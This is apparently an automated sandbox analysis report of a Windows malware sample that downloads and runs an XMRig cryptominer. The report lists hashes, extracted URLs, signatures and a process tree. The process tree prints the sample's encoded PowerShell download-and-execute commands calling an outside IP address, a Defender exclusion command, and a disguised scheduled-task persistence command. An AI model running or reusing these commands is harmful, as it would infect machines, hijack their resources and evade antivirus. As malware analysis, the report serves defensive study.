Analysis
-
max time kernel
150s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
05-01-2023 14:31
Static task
static1
Behavioral task
behavioral1
Sample
tmp.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
tmp.exe
Resource
win10v2004-20221111-en
General
-
Target
tmp.exe
-
Size
35KB
-
MD5
c1d1e760fab5a557ccaa9c30718d494d
-
SHA1
1301f10704387b04aa1287f4b1dc9566dac2f991
-
SHA256
0f962171e6a6219b0a1029987b166d8bd663f23f10cb53c6efe82a9bd11b6c27
-
SHA512
849143593a1077b091049fe7ea4048340ec69a08274ed6acc86762c862f9d29ecfe5834c720dc5bb629e2ebee106237f1702a667b691f07f233374b354f8724d
-
SSDEEP
768:8a9pgcJOnauwijxnksy4r/wOPpdwMNhghy0qt:8aXLOnaujc4kmTghy0w
Malware Config
Extracted
http://62.204.41.194/go.png
Extracted
http://62.204.41.194/F1.exe
Extracted
http://62.204.41.194/me.png
Signatures
-
XMRig Miner payload 14 IoCs
Processes:
resource yara_rule behavioral1/memory/1344-125-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral1/memory/1344-127-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral1/memory/1344-129-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral1/memory/1344-130-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral1/memory/1344-131-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral1/memory/1344-133-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral1/memory/1344-135-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral1/memory/1344-136-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral1/memory/1344-137-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral1/memory/1344-139-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral1/memory/1344-140-0x000000014036EAC4-mapping.dmp xmrig behavioral1/memory/1344-142-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral1/memory/1344-143-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral1/memory/1344-146-0x0000000140000000-0x0000000140809000-memory.dmp xmrig -
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exepowershell.exepowershell.exeflow pid process 6 1680 powershell.exe 7 276 powershell.exe 8 1564 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
Processes:
NoSleep.exeOneDrive.exepid process 1952 NoSleep.exe 1920 OneDrive.exe -
Loads dropped DLL 2 IoCs
Processes:
powershell.exetaskeng.exepid process 276 powershell.exe 1748 taskeng.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
conhost.exedescription pid process target process PID 2044 set thread context of 1344 2044 conhost.exe conhost.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 60 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.execonhost.execonhost.execonhost.exepid process 276 powershell.exe 1564 powershell.exe 1680 powershell.exe 1768 powershell.exe 276 powershell.exe 276 powershell.exe 1044 conhost.exe 2044 conhost.exe 1344 conhost.exe 1344 conhost.exe 1344 conhost.exe 1344 conhost.exe 1344 conhost.exe 1344 conhost.exe 1344 conhost.exe 1344 conhost.exe 1344 conhost.exe 1344 conhost.exe 1344 conhost.exe 1344 conhost.exe 1344 conhost.exe 1344 conhost.exe 1344 conhost.exe 1344 conhost.exe 1344 conhost.exe 1344 conhost.exe 1344 conhost.exe 1344 conhost.exe 1344 conhost.exe 1344 conhost.exe 1344 conhost.exe 1344 conhost.exe 1344 conhost.exe 1344 conhost.exe 1344 conhost.exe 1344 conhost.exe 1344 conhost.exe 1344 conhost.exe 1344 conhost.exe 1344 conhost.exe 1344 conhost.exe 1344 conhost.exe 1344 conhost.exe 1344 conhost.exe 1344 conhost.exe 1344 conhost.exe 1344 conhost.exe 1344 conhost.exe 1344 conhost.exe 1344 conhost.exe 1344 conhost.exe 1344 conhost.exe 1344 conhost.exe 1344 conhost.exe 1344 conhost.exe 1344 conhost.exe 1344 conhost.exe 1344 conhost.exe 1344 conhost.exe 1344 conhost.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 468 -
Suspicious use of AdjustPrivilegeToken 8 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.execonhost.execonhost.execonhost.exedescription pid process Token: SeDebugPrivilege 276 powershell.exe Token: SeDebugPrivilege 1564 powershell.exe Token: SeDebugPrivilege 1680 powershell.exe Token: SeDebugPrivilege 1768 powershell.exe Token: SeDebugPrivilege 1044 conhost.exe Token: SeDebugPrivilege 2044 conhost.exe Token: SeLockMemoryPrivilege 1344 conhost.exe Token: SeLockMemoryPrivilege 1344 conhost.exe -
Suspicious use of WriteProcessMemory 58 IoCs
Processes:
tmp.exepowershell.exeNoSleep.execonhost.execmd.execmd.exetaskeng.exeOneDrive.execonhost.exedescription pid process target process PID 2032 wrote to memory of 1564 2032 tmp.exe powershell.exe PID 2032 wrote to memory of 1564 2032 tmp.exe powershell.exe PID 2032 wrote to memory of 1564 2032 tmp.exe powershell.exe PID 2032 wrote to memory of 276 2032 tmp.exe powershell.exe PID 2032 wrote to memory of 276 2032 tmp.exe powershell.exe PID 2032 wrote to memory of 276 2032 tmp.exe powershell.exe PID 2032 wrote to memory of 1680 2032 tmp.exe powershell.exe PID 2032 wrote to memory of 1680 2032 tmp.exe powershell.exe PID 2032 wrote to memory of 1680 2032 tmp.exe powershell.exe PID 2032 wrote to memory of 1768 2032 tmp.exe powershell.exe PID 2032 wrote to memory of 1768 2032 tmp.exe powershell.exe PID 2032 wrote to memory of 1768 2032 tmp.exe powershell.exe PID 276 wrote to memory of 1952 276 powershell.exe NoSleep.exe PID 276 wrote to memory of 1952 276 powershell.exe NoSleep.exe PID 276 wrote to memory of 1952 276 powershell.exe NoSleep.exe PID 1952 wrote to memory of 1044 1952 NoSleep.exe conhost.exe PID 1952 wrote to memory of 1044 1952 NoSleep.exe conhost.exe PID 1952 wrote to memory of 1044 1952 NoSleep.exe conhost.exe PID 1952 wrote to memory of 1044 1952 NoSleep.exe conhost.exe PID 1044 wrote to memory of 904 1044 conhost.exe cmd.exe PID 1044 wrote to memory of 904 1044 conhost.exe cmd.exe PID 1044 wrote to memory of 904 1044 conhost.exe cmd.exe PID 1044 wrote to memory of 2008 1044 conhost.exe cmd.exe PID 1044 wrote to memory of 2008 1044 conhost.exe cmd.exe PID 1044 wrote to memory of 2008 1044 conhost.exe cmd.exe PID 904 wrote to memory of 976 904 cmd.exe schtasks.exe PID 904 wrote to memory of 976 904 cmd.exe schtasks.exe PID 904 wrote to memory of 976 904 cmd.exe schtasks.exe PID 2008 wrote to memory of 1888 2008 cmd.exe schtasks.exe PID 2008 wrote to memory of 1888 2008 cmd.exe schtasks.exe PID 2008 wrote to memory of 1888 2008 cmd.exe schtasks.exe PID 1748 wrote to memory of 1920 1748 taskeng.exe OneDrive.exe PID 1748 wrote to memory of 1920 1748 taskeng.exe OneDrive.exe PID 1748 wrote to memory of 1920 1748 taskeng.exe OneDrive.exe PID 1920 wrote to memory of 2044 1920 OneDrive.exe conhost.exe PID 1920 wrote to memory of 2044 1920 OneDrive.exe conhost.exe PID 1920 wrote to memory of 2044 1920 OneDrive.exe conhost.exe PID 1920 wrote to memory of 2044 1920 OneDrive.exe conhost.exe PID 2044 wrote to memory of 1624 2044 conhost.exe conhost.exe PID 2044 wrote to memory of 1624 2044 conhost.exe conhost.exe PID 2044 wrote to memory of 1624 2044 conhost.exe conhost.exe PID 2044 wrote to memory of 1624 2044 conhost.exe conhost.exe PID 2044 wrote to memory of 1344 2044 conhost.exe conhost.exe PID 2044 wrote to memory of 1344 2044 conhost.exe conhost.exe PID 2044 wrote to memory of 1344 2044 conhost.exe conhost.exe PID 2044 wrote to memory of 1344 2044 conhost.exe conhost.exe PID 2044 wrote to memory of 1344 2044 conhost.exe conhost.exe PID 2044 wrote to memory of 1344 2044 conhost.exe conhost.exe PID 2044 wrote to memory of 1344 2044 conhost.exe conhost.exe PID 2044 wrote to memory of 1344 2044 conhost.exe conhost.exe PID 2044 wrote to memory of 1344 2044 conhost.exe conhost.exe PID 2044 wrote to memory of 1344 2044 conhost.exe conhost.exe PID 2044 wrote to memory of 1344 2044 conhost.exe conhost.exe PID 2044 wrote to memory of 1344 2044 conhost.exe conhost.exe PID 2044 wrote to memory of 1344 2044 conhost.exe conhost.exe PID 2044 wrote to memory of 1344 2044 conhost.exe conhost.exe PID 2044 wrote to memory of 1344 2044 conhost.exe conhost.exe PID 2044 wrote to memory of 1344 2044 conhost.exe conhost.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2032 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwADoALwAvADYAMgAuADIAMAA0AC4ANAAxAC4AMQA5ADQALwBnAG8ALgBwAG4AZwAnACcAKQAnADsAJABHAE8ATwA9AEkAYABFAGAAWAAgACgAJABmADEALAAkAGYANQAsACQAZgAzACAALQBKAG8AaQBuACAAJwAnACkAfABJAGAARQBgAFgA2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1564 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -enc JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBOAG8AUwBsAGUAZQBwAC4AZQB4AGUAIgANAAoAJABXAGUAYgBGAGkAbABlACAAPQAgACIAaAB0AHQAcAA6AC8ALwA2ADIALgAyADAANAAuADQAMQAuADEAOQA0AC8ARgAxAC4AZQB4AGUAIgANAAoAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAVwBlAGIARgBpAGwAZQAsACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAoACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkA2⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:276 -
C:\Users\Admin\AppData\Roaming\NoSleep.exe"C:\Users\Admin\AppData\Roaming\NoSleep.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1952 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\NoSleep.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1044 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe\""5⤵
- Suspicious use of WriteProcessMemory
PID:904 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe\""6⤵
- Creates scheduled task(s)
PID:976 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"5⤵
- Suspicious use of WriteProcessMemory
PID:2008 -
C:\Windows\system32\schtasks.exeschtasks /run /tn "GoogleUpdateTaskMachineQC"6⤵PID:1888
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQAnAFwAQQBwAHAARABhAHQAYQAnAA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1768 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwADoALwAvADYAMgAuADIAMAA0AC4ANAAxAC4AMQA5ADQALwBtAGUALgBwAG4AZwAnACcAKQAnADsAJABHAE8ATwA9AEkAYABFAGAAWAAgACgAJABmADEALAAkAGYANQAsACQAZgAzACAALQBKAG8AaQBuACAAJwAnACkAfABJAGAARQBgAFgA2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1680
-
C:\Windows\system32\taskeng.exetaskeng.exe {20618166-D8F8-4D91-B053-A73F009B39A1} S-1-5-21-3845472200-3839195424-595303356-1000:ZERMMMDR\Admin:Interactive:[1]1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1748 -
C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exeC:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1920 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe"3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2044 -
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe "cvxjxkjice"4⤵PID:1624
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe pjsnsurpv0 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPpZDYkQjcS/S/TS19hCmaZebSGUfj6Vuv+kPoPZ9FoidkTm/7TRz3Cxu5/LqhuwWCS2hvmHfyPTAWIo4zY5OcwjP+79VuJh5O5c9vMH8WB3WKocLPQQ3D/631f214VrDNh9z0jOLbJJ9YXALTSKeo3z0yqpo23wDcDd1T/hDfuDceoldVJQGMTDTCXN0Q0os5qQZpM/bbi7sbKmKkdCHj6mFIu02fq5LlHaQLCNyvHRzVgK320/ko7oR3JyhnmBQHtbZUpiFNPFJEf7lTC77qWxEJ3h4yjiCPgrTI6MoBbSgjAmpPlQgNd71RJ7lG0ikmSTeoT3CddgZH5TjpSuHbPN3ha82GVaI5+j+dJzAfNAaJfxYNDrhTxng1MpRAutdkSftro/iAbX8hcx7q/b7Qg7J3CyclBC4/Mwe/Jeo6Q9AKf6F7/3Yi99ifKM20LuEsFK/pU/n4DnNACnryf3RdME4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1344
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5ddcffce3ff5ec791a255c20d044bf5ba
SHA1c36b48fc2c2a115e6a433532be43815b2c2bad9e
SHA2567ba624a2e3ce7c79f81c07c2aabf261903d07449fe5506abeb971a9b5b1ae998
SHA5129da15c0f92dea6eaacfb2a5b5f850d9603d29c5f995754044396835bb25191b4066a77d70c2a36f35c5654e371ae75d17127f74dfe0ba5036141d4ec2e8ded85
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5ddcffce3ff5ec791a255c20d044bf5ba
SHA1c36b48fc2c2a115e6a433532be43815b2c2bad9e
SHA2567ba624a2e3ce7c79f81c07c2aabf261903d07449fe5506abeb971a9b5b1ae998
SHA5129da15c0f92dea6eaacfb2a5b5f850d9603d29c5f995754044396835bb25191b4066a77d70c2a36f35c5654e371ae75d17127f74dfe0ba5036141d4ec2e8ded85
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5ddcffce3ff5ec791a255c20d044bf5ba
SHA1c36b48fc2c2a115e6a433532be43815b2c2bad9e
SHA2567ba624a2e3ce7c79f81c07c2aabf261903d07449fe5506abeb971a9b5b1ae998
SHA5129da15c0f92dea6eaacfb2a5b5f850d9603d29c5f995754044396835bb25191b4066a77d70c2a36f35c5654e371ae75d17127f74dfe0ba5036141d4ec2e8ded85
-
Filesize
4.4MB
MD5da256d1a520061b14d1cd013d99e84ff
SHA11aad91448144852bd1bf83dcb85bd14c6db160da
SHA256feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280
SHA5128e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71
-
Filesize
4.4MB
MD5da256d1a520061b14d1cd013d99e84ff
SHA11aad91448144852bd1bf83dcb85bd14c6db160da
SHA256feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280
SHA5128e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71
-
Filesize
4.4MB
MD5da256d1a520061b14d1cd013d99e84ff
SHA11aad91448144852bd1bf83dcb85bd14c6db160da
SHA256feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280
SHA5128e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71
-
Filesize
4.4MB
MD5da256d1a520061b14d1cd013d99e84ff
SHA11aad91448144852bd1bf83dcb85bd14c6db160da
SHA256feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280
SHA5128e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71
-
Filesize
4.4MB
MD5da256d1a520061b14d1cd013d99e84ff
SHA11aad91448144852bd1bf83dcb85bd14c6db160da
SHA256feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280
SHA5128e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71
-
Filesize
4.4MB
MD5da256d1a520061b14d1cd013d99e84ff
SHA11aad91448144852bd1bf83dcb85bd14c6db160da
SHA256feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280
SHA5128e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71